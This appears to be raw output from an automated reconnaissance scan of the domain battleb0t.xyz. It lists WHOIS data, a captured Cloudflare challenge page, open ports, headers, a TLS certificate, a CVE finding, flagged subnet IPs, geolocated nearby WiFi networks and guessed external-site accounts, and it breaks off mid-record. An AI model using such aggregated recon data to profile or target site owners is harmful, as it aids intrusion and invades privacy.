DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T02:59:37Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S., uluslararasi alan adi kayit otoritesi olan ICANN
onayli bir alan adi kayit firmasidir.
Bu alan adina ait web sitesinin icerigi ya da yayinlanmasiyla hicbir sekilde ilgisi yoktur.
Sadece, ICANN kurallari cercevesinde alan adinin kayit edilmesine aracilik yapmaktadir.
Bu alan adi sahibinin kayit sirasinda verdigi bilgiler yukaridaki gibidir.
NICS Telekomunikasyon A.S., bu bilgilerin dogrulugunu garanti edemez.
Daha fazla bilgi almak icin info [at] nicproxy.com adresine yazabilirsiniz.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
| keyubu.net |
| 2023-05-12 03:24:22 | Web Content | No | Web Spider | 2 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c5e7988238a')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="y6.jA_9kQFy3M6YOg.QQj0I7RDwRq_S0_mJGsO_2b80-1683861862-0-AcgqVWkb5rc1wRzq8CruZzqixRf2dFZvnnpeMqPo3y2RR7Jx_-WXovg8bbE5-sP--_UlGfcV7z4_V2dzBcMQgc0YMGe-kEUsKgbTagVXmpUA4ghc-4PKKMUpkHtuZz1pOKMcK0utLj3hccZMUZnWLxuhkTuTIuQG4o4TSyLTO5DkVUoXElS5eAJBZDveAXcM-BMmbtyiS5OZrdIj-mSAmfLaL706pmvV2Fnl5vtOScBdKynAsN6R2sxLPULzhy1STjWMiZSraZ6Ew2wxtjJHN1h4TKQbcQWPXgeC7N8JO4M701hR33k8KGtSEURoh0GVidfXau0xJ5Jr_OGYkw5FwTBNxUlh_dNr8sS8DOR88UaR5CKeXC5a8lA8uHqsSe_vEPdtQ6ldEQsz8iyhLDK-toyNqpISWEaAU-LNzhQYcTSFycIkBAwjz1zpN5j-awjwVXg6RSi8xKpcwkSr--vTKuOd6x5Ta6zVKvVa1ZDb1BUG5hCEGVVAylLih2TiGym6K9ZGtKfmo5uFC383bpOhjywcXyRzMeHVb0-6rTS3z63iX3ajtvlcxXXHBtT7ZYhauWYn6f0gWo9iG78z0gFNWMboZLU8duYgFtCeIooI5W88WdaOwHui00SnK7AZf-I1NO1RlI5CzrcfcBEcVnBP-f_yBVIgGca2GM5pwr7RuguWROnl62QKlF8-RLW3LA5gZmJXKAJZeG1tfcH7m64xxmCx5ACGWrjrUMscOUmz4eHVBUSovlHfs3fcaIk9rIcxhwwBJRVDZ7oKn49L5lwNMgQFGDH_uzu8lK7M31bKNSdUqZK_4nMd7x2dSJvuX6x1f0d5_OcVPHJZxZ3t19Y2v21qYtJUwk_l3orppRJLdYFyIFSiVGRp27InLA-bNsaoFJuYkaXhMvKIRYQcI57Gu9t5UJBJyHfItWPN13CPHmTRR-xesXCsUCGNSlrn27LW82G3vB0LsnqsDVH9D7CmoXk767loN6MRiMM6E9lV7pktIJEgRREZerErCz-Gw9056q07NCPJYQafcy44fhA0Ayu8GVn0zQYz2hW6ho8NtCxWLxQfDeVyMn6PMsg4IcHVBtGEwWH4OhHGTM9Y96fCik0WwBZwbXdS00HiRtlSReGbhDYPFuGYXFHlUkiHUQ8TNNjJwXP8HrnSnr-Tv6HMk8DT21iZM1t8Ws-Z1VPVHIUqMpqoj6bYoJTKdTHCyWVXSoymcDjiiAr_dGcQ70iCvCfjEHAw9_ZFb11mKAVckSFfHs_OhqOxwVZ8fWFWX5CRVYjb8-2Mg4cL3IvIHLOVh97Eo-8uZhAyESkAuV2iGT1_77CGqcRlglDGfKHj9D0j_GrA2lys8V_W4n84xH9sB9BtW8YrWDnEH4r1lV4ZaxbUDArRwxqP9P1FzSMMjtcVzsgzIRpF2ste2ogtL1ku1f750t7TYDkzGvNZnmSp--sTxTZcyZjvZuT-kxIOnFkQudjV92D0dpRia33x6FdgV44_rvGqDtNVBEvpDVRPc5F7iWJTGkpG_0wSt-t0pHAlpnVj5960VNsQ1fIVqzIjyeTRIupoKny56OID3zofBUX9GXMMvftzuBxkvH568kA-nhoghfb5gJUTU4dQVs3R3lvIMsLJW_0OugCzVwa7bbjSi3yNlNTmyyZSUaQHqMOYwEHt04GQZ_JQBpDCQvIGLq1fOLeArqr97ZPrGgk_x7n2c6MIQK0vFFlSI1sI8OS4yi8D0V-GNr2Bt_G2Ue_TKIZGNfQPaWAM0jGlpc1nPWIZS-sYxW-8ui-6eexGBFZ5-zLr2uaHNG_xNol2Di7iRI4TW5JoZOZTUx2wSZVCmafA5viAw12czMeK4Ymm36GiAo0mTnIrrghObXpHRydCjEOD-ie6KdVTajZGWvZP24dk25nzrx7uELmxfIPaAvIALx9AdiYBCbeQ0Yz_UH9uDQF6Eh_AqthmXwQQH1F4IA_32McFzcxir6Txr6Mur3t22mOZF963IcNMqvP7vPcccq_rufb25sF8o6nhmaVg8cgPEKIwNeq8Yai0pVnLlllLMVSWIHePNfLuLOdg9LDG1pq1rafu4Rgb-yc2Aoh4enGvHZkuRe6wlOLCDdREAADDoXkFVowEW_DGLxK1pMON0uU78NiTV9_r2o4osZBaOPn8heMmK90xPpnLokgH3gubppwq1gfmaT0RIIPWt7RVKpJRXQ_wSjLVjILALRXQY6PbelUym6TQ1z5fJfHRmrHxVnQvY6aogsFcFGtQVSrl8OCNEwv9P3oaH1GWxoSabHdrSKZmlLs2m-l9LJf4El9FKIA3NBr09u94xMLRSPmEHb4Ol-KPCw5RJiAwyBy2nrohjehlLLjGIgbGh_hTPi8G-yGwVEOyQB8GJBts_O8-g8mz65tw5NpdS_SbFPOasS6txd-b_DzeOnkkcJgqOwM_x3VH39HvzlVBkxqyTu-7yh1ffXA3EAxe-TkXe6foRnX1wH3iJh2_MCDDGxTOkk8Xj59t6wAawmHCKnU2CvogDUE">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '13063',
cRay: '7c5f8c5e7988238a',
cHash: 'ba708169066f393',
cUPMDTk: "\/?__cf_chl_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'YtLw1r+G4BXsd0FkRMvka85wm7Lw/iR0rXUYENjW5JZbvNWZBYa0q0+Il8LjyNehJabAqUtaWf767wbCNaYgySnBqnpPsMoOa0cKWt1fZp4gdy+C8LU/pGEGRmyTt+1SC3FdTYu6cI8WiDs6EYfaolZ1Q4GzSM9aW8XcriqivgIDXT1BzBjJwTzpAp1U3aRGBhldnftnEosz5IN8cZ/ZfjD59KxZxCk4YJ82hAC/4p5NK53nkqtCB8+yebFdC+eEhhByuy+cDGuW019GQtjFSS9CeSHMkq0X5vvnjvWzUwgZWatWT4cb7H1DRCSbe56JnIW2SqUEUemPQIyx8r8XETw2r/jfEGJaIkWc0xNQcTIwyTo7s7DjvWVDpJZwE8RGlfo+XMla1yJOLJeQ4p8yS62WkxGCezqaUSIRC9W7/EJZB2hizQMBsQ33Qut7vH5/uRFNuCVFUoIv1B6FDgjnGpAfl6VMz5kByy7JL0ytkDTuSpiY63YcvOGMdbIIR3h4udGCBX1zULf54DaAq4yJPJFFrDJ28oS3TKgFFoFGJa2VsTR4xn/6LIYLPcOgI6uz',
t: 'MTY4Mzg2MTg2Mi4xNjAwMDA=',
m: 'c3pqWAYwgRkhuI1rZgTpwNhg2e/0sRGYZUtHGzVigsI=',
i1: 'NNf66iKUbSi3dpVZsq8TXQ==',
i2: 'dYlWHTj6TB0dDvgfdZy2xA==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c5e7988238a');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c5e7988238a';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| http://ayhu.xyz/ |
| 2023-05-12 02:44:11 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 1 | 1 | 0 | None | githubusercontent.com | battleb0t.xyz |
| 2023-05-12 02:45:32 | Malicious IP Address | Yes | PhishStats | 0 | 1 | 2 | 0 | None | Phishstats [104.21.6.166]
| 104.21.6.166 |
| 2023-05-12 03:05:12 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | fluid.battleb0t.xyz |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.33): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:03:37 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00ty.github.io |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:54:16 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://oldfluid.battleb0t.xyz/dat.gui.min.js | https://oldfluid.battleb0t.xyz/ |
| 2023-05-12 02:52:56 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:c7:00:14:21:71:88:e2:18:10:f8:e3:ee:d1:89:37:10:7b
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:46:47 2022 GMT
Not After : Mar 27 01:46:46 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ca:91:c0:24:2c:ac:ca:ae:72:a2:1c:76:2b:73:
ee:03:78:0b:80:eb:3e:1e:2f:33:3d:ee:c9:08:d3:
24:62:ca:69:54:4a:4f:62:ee:85:3e:9e:5e:5f:d1:
1f:ab:8a:39:77:32:f2:c3:16:74:4d:2e:2a:61:7c:
7c:02:16:fd:f8:90:cd:06:b2:e9:f4:43:77:1b:75:
bb:be:c8:56:44:f6:50:11:ac:06:ec:e8:59:ef:64:
25:2f:4d:3f:96:fc:de:28:67:0a:4e:3f:7e:0e:35:
82:50:a2:e2:53:60:28:9a:07:c8:48:6d:b6:14:30:
5d:26:53:a7:34:c5:04:39:e7:67:e1:8b:e5:5d:a5:
3a:24:32:e3:b6:35:44:1a:60:82:6c:43:b7:4d:91:
70:e8:77:c6:32:fc:99:9f:ad:b8:12:75:4d:70:f3:
52:73:ab:3d:62:1e:0f:a1:00:40:14:f2:ee:4f:92:
e4:8c:8a:19:22:54:b9:c3:71:e1:6b:29:43:5b:56:
a9:e7:cc:16:78:2e:25:bc:fa:16:51:9d:87:b3:64:
aa:85:a8:c4:c7:1b:38:de:e1:9c:ae:93:7d:3f:98:
02:a9:aa:fa:8c:80:52:99:2e:98:ff:77:3d:76:8b:
8f:32:cd:03:00:51:9a:81:df:0d:68:7a:8d:16:fa:
b6:b1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
6C:34:7D:03:48:53:73:CF:0D:0C:39:44:A5:D1:A0:E8:F3:90:7F:11
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 27 02:46:47.420 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:5E:6B:E1:80:95:E9:06:B9:64:A1:6D:DC:
F7:46:19:D7:44:B3:41:56:D0:CD:B2:17:79:5E:38:01:
98:82:42:B4:02:21:00:BB:82:4F:AE:81:BB:9F:FF:F6:
F5:EC:BC:04:24:9F:54:06:50:1B:72:28:CB:B2:D2:B9:
F3:82:3C:FB:08:50:07
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 27 02:46:47.434 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:DB:34:C7:60:1E:A0:7B:B4:93:B7:C3:
6F:79:DF:2B:2D:A1:07:F6:E0:3C:66:9E:DB:AB:71:DF:
C8:12:FA:43:40:02:20:40:0C:EE:4D:C0:C7:6C:61:B4:
C4:4E:15:E2:3B:37:04:6C:A3:AE:DB:A8:2D:9F:6D:D1:
44:F8:EF:BB:53:2D:AA
Signature Algorithm: sha256WithRSAEncryption
2d:0d:59:11:7e:bd:11:7c:f4:13:c8:d6:c5:40:47:7f:c1:17:
f8:18:85:ad:f5:ee:eb:ca:33:40:d0:80:8a:a2:5e:d9:cb:36:
84:5e:8f:ea:da:80:c0:0f:bc:fb:ed:5d:aa:90:c6:8d:e2:e0:
93:88:ba:dd:b6:40:89:0d:e9:1c:2b:f7:10:55:11:ed:5f:b4:
fb:fb:56:28:a1:cf:a8:59:b5:c5:78:e9:54:8e:06:d9:23:af:
f2:43:7d:64:52:f1:26:ea:4f:5e:ca:47:af:10:86:bc:07:b5:
f9:72:9d:08:e5:af:f4:89:55:6c:58:05:70:62:87:bc:37:3c:
b1:7c:29:a6:06:1e:b5:a4:e0:40:13:6d:69:d7:73:91:80:75:
18:3c:5b:0a:7c:a4:ff:05:c7:98:e1:97:78:96:31:ea:08:08:
4a:40:e6:a1:dd:b4:58:50:6f:80:e3:70:72:18:89:1b:9e:32:
1a:ca:dd:a2:a8:e9:74:eb:2c:c4:a6:1c:b7:31:48:b6:e4:67:
9b:a7:9c:a6:df:cd:82:95:8c:31:83:cd:c7:0e:e3:d2:a3:19:
06:a0:13:7b:a7:11:2c:dd:85:53:7f:ff:2c:0f:11:cf:5d:a7:
fb:7d:2f:9b:4b:7a:3e:55:04:0b:72:4a:13:4f:26:99:3b:63:
24:f8:e3:2a
| battleb0t.xyz |
| 2023-05-12 02:54:38 | Physical Location | No | Censys | 0 | 0 | 3 | 0 | None | San Francisco, California, 94107, United States, North America | 172.67.168.252 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | hhcpa (Net ID: 00:06:25:3B:8E:36) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Andrea Schwartz Gallery 5G (Net ID: 00:01:9F:3D:4F:6C) | 37.7813933,-122.3918002 |
| 2023-05-12 03:00:56 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00lt00.github.io | 185.199.111.153 |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.113): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:53:15 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 185.199.108.153 | battleb0t.xyz |
| 2023-05-12 03:18:46 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Horizontal (normal) @ 18} | https://pics.battleb0t.xyz/images/withat_1.jpg |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 4 | 0 | None | 15169 | 35.229.48.0/20 |
| 2023-05-12 02:53:39 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 9954:9C3B:20A7B64:2F7931C:645C5074
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 259
X-Served-By: cache-chi-klot8100161-CHI
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1683771768.574276,VS0,VE2
Vary: Accept-Encoding
X-Fastly-Request-ID: 8a09b57cb5993eaa6860d607d298dd9826aef348
| 185.199.108.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | setlist.fm (Category: music)
https://www.setlist.fm/user/login | login |
| 2023-05-12 03:32:17 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.9:80 | 188.114.97.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MHeckmans (Net ID: 00:02:CF:CB:87:99) | 50.8897, 6.0563 |
| 2023-05-12 02:54:19 | HTTP Headers | No | Web Spider | 6 | 0 | 4 | 0 | None | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=vgB2xlauGELdj%2BVZddouVM4SLWiyGeZvDcjgyrNUJ4TCe9uwaasjv9pVNp9guo70Mwha6%2BIFTjO1Dq74W7EW2JKyrFRh0Oar6OFkdlmTZx5KugtXbII33uvqzZHNgPLMNucdvqQl\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605ceb464381-EWR"} | https://fluid.battleb0t.xyz/dat.gui.min.js |
| 2023-05-12 02:44:12 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | CN=*.cloudwaysapps.com | kekw.battleb0t.xyz |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.202): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:8443 | 104.21.6.166 |
| 2023-05-12 03:36:20 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.128:8080 | 188.114.97.0/24 |
| 2023-05-12 03:12:10 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 5 | 0 | None | Search engine optimization metrics - A number of metrics are available to marketers interested in search engine optimization. Search engines and software creating such metrics all use their own crawled data to derive at a numeric conclusion on a website's organic search potential. | baffin.netcraft.com |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | xHamster (Category: XXXPORNXXX)
https://xhamster.com/users/login | login |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | monks56 (Net ID: 00:06:25:C3:88:45) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WLAN (Net ID: 00:01:24:F0:97:C1) | 37.7813933,-122.3918002 |
| 2023-05-12 02:55:25 | Username | No | Social Network Identifier | 43 | 0 | 4 | 0 | None | Altpapier | https://github.com/Altpapier/SkyHelperAPI/issues |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.49): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 172.67.168.252 |
| 2023-05-12 02:53:04 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.111.153:443 | 185.199.111.0/24 |
| 2023-05-12 02:44:19 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | www.github.com | 185.199.110.153 |
| 2023-05-12 02:47:26 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 8, u'threat_score': 80, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://zaratec.io/assets/img/favicons/site.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "AcroRd32.exe" (UID: 00000000-00003900) was launched with modified environment variables: "PATH"\n Process "RdrCEF.exe" (UID: 00000000-00001728) was launched with modified environment variables: "PATH"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': 